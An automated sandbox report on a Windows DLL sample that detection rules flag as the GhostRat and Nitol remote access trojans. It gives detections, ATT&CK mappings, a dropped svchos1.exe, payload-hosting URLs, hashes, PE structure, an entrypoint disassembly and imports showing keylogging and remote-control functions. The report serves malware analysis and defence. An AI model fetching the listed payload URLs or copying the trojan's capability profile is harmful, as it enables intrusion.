                  Source: Yara matchFile source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5796, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6528, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2408, type: MEMORYSTR
                  Yara detected Nitol
                  Source: Yara matchFile source: l10U7QN0CY.dll, type: SAMPLE
                  Source: Yara matchFile source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE

                  Remote Access Functionality

                  barindex
                  Yara detected GhostRat
                  Source: Yara matchFile source: l10U7QN0CY.dll, type: SAMPLE
                  Source: Yara matchFile source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Yara detected Nitol
                  Source: Yara matchFile source: l10U7QN0CY.dll, type: SAMPLE
                  Source: Yara matchFile source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10023650 socket,bind,getsockname,inet_addr,5_2_10023650
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10023A10 WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle,5_2_10023A10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10023650 socket,bind,getsockname,inet_addr,9_2_10023650
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10023A10 WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle,9_2_10023A10

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		111
                  Input Capture                  		1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts12
                  Service Execution                  		1
                  Create Account                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol111
                  Input Capture                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt111
                  Windows Service                  		1
                  Access Token Manipulation                  		3
                  Obfuscated Files or Information                  		Security Account Manager1
                  System Service Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		SteganographyAutomated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Bootkit                  		111
                  Windows Service                  		1
                  Timestomp                  		NTDS2
                  File and Directory Discovery                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script23
                  Process Injection                  		1
                  DLL Side-Loading                  		LSA Secrets15
                  System Information Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials1
                  Network Share Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation                  		DCSync12
                  Security Software Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job23
                  Process Injection                  		Proc Filesystem12
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Bootkit                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Rundll32                  		Network Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Indicator Removal                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1557658 Sample: l10U7QN0CY.dll Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus / Scanner detection for submitted sample 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 6 other signatures 2->46 9 loaddll32.exe 1 2->9         started        process3 signatures4 48 Found evasive API chain (may stop execution after checking mutex) 9->48 50 Contains functionality to automate explorer (e.g. start an application) 9->50 52 Contains functionality to infect the boot sector 9->52 54 4 other signatures 9->54 12 rundll32.exe 9->12         started        16 cmd.exe 1 9->16         started        18 conhost.exe 9->18         started        process5 file6 38 C:\Users\Public\Documents\MM\svchos1.exe, PE32 12->38 dropped 56 Found evasive API chain (may stop execution after checking mutex) 12->56 58 Contains functionality to automate explorer (e.g. start an application) 12->58 60 Contains functionality to infect the boot sector 12->60 62 3 other signatures 12->62 20 cmd.exe 2 12->20         started        22 cmd.exe 12->22         started        24 rundll32.exe 1 1 16->24         started        signatures7 process8 process9 26 conhost.exe 20->26         started        28 conhost.exe 22->28         started        30 cmd.exe 24->30         started        32 cmd.exe 24->32         started        process10 34 conhost.exe 30->34         started        36 conhost.exe 32->36         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  l10U7QN0CY.dll68%ReversingLabsWin32.Downloader.GhostRAT
                  l10U7QN0CY.dll100%AviraBDS/Zegost.lloamn
                  l10U7QN0CY.dll100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\Public\Documents\MM\svchos1.exe0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt0%Avira URL Cloudsafe
                  https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt0%Avira URL Cloudsafe
                  https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txthttps://0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ssl.ptlogin2.qq.com%sloaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllfalse
                    		high
                    https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txtloaddll32.exe, loaddll32.exe, 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://localhost.ptlogin2.qq.com:4301%sAccept-Language:loaddll32.exe, rundll32.exefalse
                      		high
                      https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllfalse
                        		high
                        https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txtloaddll32.exe, loaddll32.exe, 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ssl.ptlogin2.qq.com%sAccept-Language:loaddll32.exe, rundll32.exefalse
                          		high
                          http://ptlogin2.qun.qq.com%sloaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllfalse
                            		high
                            http://ptlogin2.qun.qq.com%sAccept-Language:loaddll32.exe, rundll32.exefalse
                              		high
                              http://qun.qq.com%sloaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllfalse
                                		high
                                https://localhost.ptlogin2.qq.com:4301%sloaddll32.exe, loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllfalse
                                  		high
                                  http://qun.qq.com%sAccept-Language:loaddll32.exe, rundll32.exefalse
                                    		high
                                    https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txthttps://loaddll32.exe, 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, l10U7QN0CY.dllfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    No contacted IP infos

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1557658
                                    Start date and time:2024-11-18 14:17:48 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 35s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:25
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:l10U7QN0CY.dll
                                    renamed because original name is a hash value
                                    Original Sample Name:f036b3031238597750e077c2d03b2bc41d089f9db461244059db8485fac28e63.dll
                                    Detection:MAL
                                    Classification:mal100.bank.troj.spyw.evad.winDLL@20/1@0/0
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 9
                                    • Number of non-executed functions: 279
                                    Cookbook Comments:
                                    • Found application associated with file extension: .dll
                                    • Override analysis time to 240s for rundll32

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • VT rate limit hit for: l10U7QN0CY.dll

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    No context

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\Public\Documents\MM\svchos1.exeKlzXRW4Ag7.dllGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                      ZfJheGhddq.dllGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                        PD5dVJNpz7.dllGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                          7YtmCkMUx3.dllGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                            tROeAyXq2X.exeGet hashmaliciousMimikatz, RunningRATBrowse
                                              me.exeGet hashmaliciousRunningRATBrowse
                                                gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
                                                  uHmFQqHIIA.exeGet hashmaliciousRunningRATBrowse
                                                    ofR1Hd4NPM.exeGet hashmaliciousRunningRATBrowse
                                                      9JQ3JboYdz.exeGet hashmaliciousRunningRATBrowse

                                                        Created / dropped Files

                                                        C:\Users\Public\Documents\MM\svchos1.exe

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):61440
                                                        Entropy (8bit):6.199746098562656
                                                        Encrypted:false
                                                        SSDEEP:1536:H9ykYCTdiHQKrFXmw2RQln5IUmDjoX6+:HlMHprF2nRQln5I
                                                        MD5:889B99C52A60DD49227C5E485A016679
                                                        SHA1:8FA889E456AA646A4D0A4349977430CE5FA5E2D7
                                                        SHA-256:6CBE0E1F046B13B29BFA26F8B368281D2DDA7EB9B718651D5856F22CC3E02910
                                                        SHA-512:08933106EAF338DD119C45CBF1F83E723AFF77CC0F8D3FC84E36253B1EB31557A54211D1D5D1CB58958188E32064D451F6C66A24B3963CCCD3DE07299AB90641
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: KlzXRW4Ag7.dll, Detection: malicious, Browse
                                                        • Filename: ZfJheGhddq.dll, Detection: malicious, Browse
                                                        • Filename: PD5dVJNpz7.dll, Detection: malicious, Browse
                                                        • Filename: 7YtmCkMUx3.dll, Detection: malicious, Browse
                                                        • Filename: tROeAyXq2X.exe, Detection: malicious, Browse
                                                        • Filename: me.exe, Detection: malicious, Browse
                                                        • Filename: gE4NVCZDRk.exe, Detection: malicious, Browse
                                                        • Filename: uHmFQqHIIA.exe, Detection: malicious, Browse
                                                        • Filename: ofR1Hd4NPM.exe, Detection: malicious, Browse
                                                        • Filename: 9JQ3JboYdz.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.....^...^...^.pb^...^.c._...^.c._...^...^c..^.c._...^.c._...^.c._...^.c.^...^.c._...^Rich...^........PE..L...9..j.................b...........a............@..........................@............@.............................................hg...................0..........T........................... ........................m..`....................text...La.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat...............~..............@....rsrc...hg.......h..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.332307039094522
                                                        TrID:
                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                        • DOS Executable Generic (2002/1) 0.20%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:l10U7QN0CY.dll
                                                        File size:1'269'760 bytes
                                                        MD5:4a2579809a60dafdd9da2c50484e8735
                                                        SHA1:d3e1c79b5b5d7ab8ff2313d7696998527a3f5bd1
                                                        SHA256:f036b3031238597750e077c2d03b2bc41d089f9db461244059db8485fac28e63
                                                        SHA512:2af6ee811093ae53ec4d9358d44a5d6fbc32a85b509502010490c4eb324dd22cc659478ea2d39aa37b70dac71ca9544e427acd440f4ff1024bf0557ec0c666ff
                                                        SSDEEP:24576:LohYJJUEWaGjGM7hiBrDaFy73fChNqhXWSNNmbCTM5GrkQPXHMtR1tD1b1tTkRoN:Lorx7TkQ
                                                        TLSH:D1455B43E2B64CA3D7D80034DC6AE7B677347A1D97F786737240EDDAB5A22907D2420A
                                                        File Content Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.........q!_..r_..r_..r...r^..ri..rY..rx.dr]..r../re..r_..r...r0..r^..r0..r[..r0..r[..r$..rX..r...rX..ri..r]..ri..r]..r..@r[..r..Br@..

                                                        File Icon

                                                        Icon Hash:7ae282899bbab082

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x1002d2eb
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x10000000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                        DLL Characteristics:
                                                        Time Stamp:0x672371E7 [Thu Oct 31 12:02:47 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:6718574bfa82ab04bcaf82fa9136fc6c

                                                        Entrypoint Preview

                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        push ebx
                                                        mov ebx, dword ptr [ebp+08h]
                                                        push esi
                                                        mov esi, dword ptr [ebp+0Ch]
                                                        push edi
                                                        mov edi, dword ptr [ebp+10h]
                                                        test esi, esi
                                                        jne 00007FE5EC7D505Bh
                                                        cmp dword ptr [1012F1F4h], 00000000h
                                                        jmp 00007FE5EC7D5078h
                                                        cmp esi, 01h
                                                        je 00007FE5EC7D5057h
                                                        cmp esi, 02h
                                                        jne 00007FE5EC7D5074h
                                                        mov eax, dword ptr [10158620h]
                                                        test eax, eax
                                                        je 00007FE5EC7D505Bh
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call eax
                                                        test eax, eax
                                                        je 00007FE5EC7D505Eh
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call 00007FE5EC7D4F6Ah
                                                        test eax, eax
                                                        jne 00007FE5EC7D5056h
                                                        xor eax, eax
                                                        jmp 00007FE5EC7D50A0h
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call 00007FE5EC7C91CAh
                                                        cmp esi, 01h
                                                        mov dword ptr [ebp+0Ch], eax
                                                        jne 00007FE5EC7D505Eh
                                                        test eax, eax
                                                        jne 00007FE5EC7D5089h
                                                        push edi
                                                        push eax
                                                        push ebx
                                                        call 00007FE5EC7D4F46h
                                                        test esi, esi
                                                        je 00007FE5EC7D5057h
                                                        cmp esi, 03h
                                                        jne 00007FE5EC7D5078h
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call 00007FE5EC7D4F35h
                                                        test eax, eax
                                                        jne 00007FE5EC7D5055h
                                                        and dword ptr [ebp+0Ch], eax
                                                        cmp dword ptr [ebp+0Ch], 00000000h
                                                        je 00007FE5EC7D5063h
                                                        mov eax, dword ptr [10158620h]
                                                        test eax, eax
                                                        je 00007FE5EC7D505Ah
                                                        push edi
                                                        push esi
                                                        push ebx
                                                        call eax
                                                        mov dword ptr [ebp+0Ch], eax
                                                        mov eax, dword ptr [ebp+0Ch]
                                                        pop edi
                                                        pop esi
                                                        pop ebx
                                                        pop ebp
                                                        retn 000Ch
                                                        jmp dword ptr [100B7424h]
                                                        jmp dword ptr [100B7420h]
                                                        jmp dword ptr [100B7418h]
                                                        jmp dword ptr [100B73F4h]
                                                        jmp dword ptr [100B73BCh]
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        jmp dword ptr [00000000h]

                                                        Rich Headers

                                                        Programming Language:
                                                        • [ C ] VS98 (6.0) SP6 build 8804
                                                        • [IMP] VS2005 build 50727
                                                        • [C++] VS98 (6.0) SP6 build 8804
                                                        • [ C ] VS98 (6.0) build 8168
                                                        • [C++] VS98 (6.0) build 8168
                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                        • [LNK] VS98 (6.0) imp/exp build 8168

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0xf97400x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xf70880x190.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1990000x10.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x19a0000x66a8.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0xb70000x754.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x97d6a0x98000e897ade4613f14c186e47314e615a48eFalse0.4028191817434211data6.771812210263706IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rodata0x990000x2e500x30000ca3681ca0d1b13e402ba8d29971b5f2False0.28173828125data6.052273401613891IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rotext0x9c0000x1ae920x1b0000cf40eb5df713fafa4fc5205f48cf359False0.14991138599537038data5.9970516003376195IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0xb70000x427800x43000134eaca3747752ce75713a6fe585e691False0.09635902518656717data3.5858946280363218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xfa0000x9e7c00x32000f2a1d1684fbf275c21a726939f4136b9False0.299365234375data5.521664838208221IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x1990000x100x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x19a0000x803e0x90006580d84a594dafda37b08b4e7c902d0cFalse0.5600043402777778data5.559864488964834IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Imports

                                                        DLLImport
                                                        KERNEL32.dllProcess32First, GetSystemDirectoryA, TerminateProcess, OpenProcess, ExitProcess, GetVersion, DeviceIoControl, Beep, GetVersionExA, GetModuleFileNameA, WinExec, TerminateThread, GetTickCount, GetCommandLineA, FreeConsole, GetCurrentProcessId, GetConsoleProcessList, AttachConsole, GetWindowsDirectoryA, WideCharToMultiByte, MultiByteToWideChar, GlobalSize, QueryPerformanceFrequency, QueryPerformanceCounter, LoadLibraryW, GlobalMemoryStatusEx, GetDriveTypeA, ReleaseMutex, CreateMutexA, GetCurrentThread, GetEnvironmentVariableA, GetCurrentThreadId, CreatePipe, CopyFileA, lstrcpyW, Module32Next, lstrcmpiA, Module32First, CreateRemoteThread, GetProcessId, ResumeThread, OpenThread, Thread32Next, Thread32First, SuspendThread, Process32Next, GlobalMemoryStatus, GetComputerNameA, GetPrivateProfileStringA, SystemTimeToTzSpecificLocalTime, lstrcpynA, lstrcmpA, lstrcatA, CreateProcessA, GetProcAddress, lstrcpyA, CreateDirectoryA, GetLastError, DeleteFileA, GetCurrentProcess, IsWow64Process, SetFilePointer, WriteFile, CreateFileA, GetFileSize, ReadFile, lstrlenA, FreeLibrary, IsBadReadPtr, VirtualProtect, HeapReAlloc, HeapAlloc, GetProcessHeap, HeapFree, CancelIo, SetEvent, ResetEvent, CreateEventA, LocalAlloc, LocalReAlloc, LocalSize, LocalFree, Sleep, GetFileAttributesA, GetModuleHandleA, GetLocalTime, GlobalAlloc, GlobalLock, GlobalFree, GlobalUnlock, CreateThread, VirtualAlloc, EnterCriticalSection, LeaveCriticalSection, VirtualFree, DeleteCriticalSection, InitializeCriticalSection, InterlockedExchange, CreateToolhelp32Snapshot, GetFileAttributesExA, FileTimeToSystemTime, MoveFileA, SetFileAttributesA, RemoveDirectoryA, FindFirstFileA, FindNextFileA, FindClose, GetLogicalDriveStringsA, GetVolumeInformationA, GetPriorityClass, GetDiskFreeSpaceExA, WaitForSingleObject, CloseHandle, LoadLibraryA, GetSystemInfo
                                                        USER32.dllSetRect, GetCursorPos, GetCursorInfo, PostMessageA, SetCursorPos, WindowFromPoint, SetCapture, MapVirtualKeyA, SystemParametersInfoA, ReleaseDC, BlockInput, DestroyCursor, LoadCursorA, GetDC, GetSystemMetrics, ChangeDisplaySettingsA, FindWindowA, ShowWindow, MoveWindow, GetWindowRect, SwapMouseButton, ExitWindowsEx, EnumWindows, GetKeyState, GetAsyncKeyState, GetForegroundWindow, GetWindowTextA, CharNextA, GetDesktopWindow, wsprintfA, EmptyClipboard, SetClipboardData, OpenClipboard, GetClipboardData, CloseClipboard, GetWindowLongA, PostQuitMessage, SetWindowLongA, LoadIconA, SetClassLongA, DestroyWindow, SetFocus, GetWindowTextLengthA, SetWindowTextA, SetDlgItemTextA, CreateDialogIndirectParamA, GetDlgItem, SetWindowPos, OpenInputDesktop, GetDlgItemTextA, CloseDesktop, GetThreadDesktop, GetUserObjectInformationA, SetThreadDesktop, GetWindowThreadProcessId, WaitForInputIdle, GetClassNameA, GetWindow, GetLastInputInfo, IsIconic, MessageBoxA, IsWindowVisible, GetMessageA, IsDialogMessageA, TranslateMessage, SendMessageA, DispatchMessageA
